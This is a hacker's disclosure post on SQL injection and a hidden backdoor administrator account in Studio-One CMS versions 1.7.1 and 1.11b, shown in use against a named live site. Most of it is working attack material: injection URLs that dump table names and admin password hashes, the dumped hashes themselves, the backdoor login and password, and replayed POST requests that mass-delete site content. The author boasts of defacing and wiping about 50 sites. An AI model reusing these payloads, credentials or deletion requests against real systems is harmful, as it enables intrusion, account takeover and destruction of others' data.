Studio-One CMS versions 1.7.1 and 1.11b suffer from a remote blind SQL Injection vulnerability. Note that this finding houses site-specific data.
5ad28110810d3f7b1fc935a71ea4f62fa3c6db304eb9c0724237c8a7c67db3d4
========================================================
Vulnerable Software(S): CMS | 1.11b/CMS | 1.7.1 From Studio-one.am
Vulnerabilities: This Content management systems suffers from
Remote Blind SQl injection and Backdoor account.
Software License: Commercial
Vendor: studio-one.am
Discovered and Exploited: In Wild
========================================================
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************
Full Disclosure:
The following CMS | 1.11b and CMS | 1.7.1 (From Studio-one.am) content management systems
suffers from Remote Blind SQl injection and Backdoor account.
//TRUE
http://galatv.am/news/other/aimm-naxagahh%27%20or%20sleep(10)--%20and%205=%275.html
We got time delay:
galatv.am CMS | 1.11b
http://galatv.am/news/other/aimm-naxagahh%27%20order%20by%2026--%20and%205=%275.html
Got Columns count: 26
Problem number 1: We can't use =>,<= Otherwise we'll get 404 (May be rewrite rule?)
Bypass?Pretty simple: hex() representation of =>,=> so it's=> %2C
http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html
http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html
Success!
http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html
21 22 21 24 14-
http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat%28table_name%29%2C22%2C23%2C24%2C25%2C26%20from%20information_schema.tables--%20and%205=%275.html
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,s1_ads,s1_ads_menu_rel,s1_ads_ml,s1_adsgroup,s1_adsgroup_ml,s1_answers,s1_answers_ml,s1_autor,s1_autor_m
So we need obtain:
login
password
from
s1_users
galatv.am/news/other/saimm-naxagahh' union select 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat(login%2Cpassword)%2C22%2C23%2C24%2C25%2C26 from s1_users-- and 5='5.html
100%
----------------------------------------------------
admin
6dedf4ba59fbcd8c2d72eec63738fc6d
GalaAdmin
4bad4ecf9b88e344a7e6fbe517d4e590
----------------------------------------------------
newPass123
Printscreen: http://s44.radikal.ru/i106/1209/3c/64f2a7cf8278.png
OwNEd! http://zone-h.org/mirror/id/18297506
Done!
Ok.After gaining access to administration panel i noticed theris 2800>= news exists in database.
Ownage without "rm"s or without "drop"s agains .am domains is not interesting anymore.
Searching..Searching..Got it:
Here is truncating way:
------------------------------------------------------------------------------------------------------------------------
Live HTTP Headers:
URL: http://galatv.am/admin/news-content/news?viewAjax=1&action=delete&tpl=view.tpl
Host: galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Cookie: PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73
Pragma: no-cache
Cache-Control: no-cache
POST DATA:
viewAjax=1&id=1000000000000 or id!=3--
*REPLAY*
------------------------------------------------------------------------------------------------------------------------
Printscreen: http://s019.radikal.ru/i625/1209/95/fccad046aa62.png
BoOm!) All news was successfully "truncated" using SQLi vuln)
Then i needed to truncate menu sections:
Same technique:
------------------------------------------------------------------------------------------------------------------------
Live HTTP Headers:
URL: http://galatv.am/admin/content%20elements/menu?viewAjax=1&action=delete&tpl=view.tpl
Host: galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Cookie: menutreeNodes=%5B1%5D; PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73; __utma=137480943.837184604.1346617574.1346617574.1346617574.1; __utmb=137480943.2.10.1346617574; __utmc=137480943; __utmz=137480943.1346617574.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Pragma: no-cache
Cache-Control: no-cache
POST DATA:
viewAjax=1&id=27 or id!=007
------------------------------------------------------------------------------------------------------------------------
Again Boom!)
=================== WE ALSO LOVE BACKDOORS========================
This CMS also suffers from backdoor account which has full administrative privileges.
It is also hidden account: This means you can't see it from administration panel:
Print screen:
( Basically: theris 1 backdoor account and 1 legal administrator.
Notice: backdoor account isn't visible anymre )
http://s53.radikal.ru/i140/1209/c4/685d07418e00.png
I used this administrative account to deface and "rm" approx 50 .am sites)
Login: admin
Pass: newPass123
=====================CMS version 1.7.1 ==============================
How it looks: http://s019.radikal.ru/i602/1209/2d/85589f0d9f49.png
Also suffers from backdoor account:
Print screen:
http://i021.radikal.ru/1209/83/8390644da6b5.png
The account named: admin still invisible again.
<title>:: CMS :: | 1.7.1</title>
Demo:
http://new.galatv.am/admin/
Login: admin
Pass: newPass123
This version also is vulnerable to SQLi
Again i'm "rm"-ned all news using SQLi:
URL: http://new.galatv.am/admin/news-block/news?action=delete&viewAjax=1&tpl=dt/edit-dialog.tpl
Host: new.galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Cookie: PHPSESSID=bqu6dn6ks70iqocivfioetomh7
Pragma: no-cache
Cache-Control: no-cache
POST DATA:
btnDelete=Delete&btnCancel=Cancel&id=1 or id!=011111111111111
Returned:
{"succsess":true,"records":["1 or id!=011111111111111"]}
==========================================
To studio-one.am: We luve backdoors too;)
=============== THE END ===================
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
/AkaStep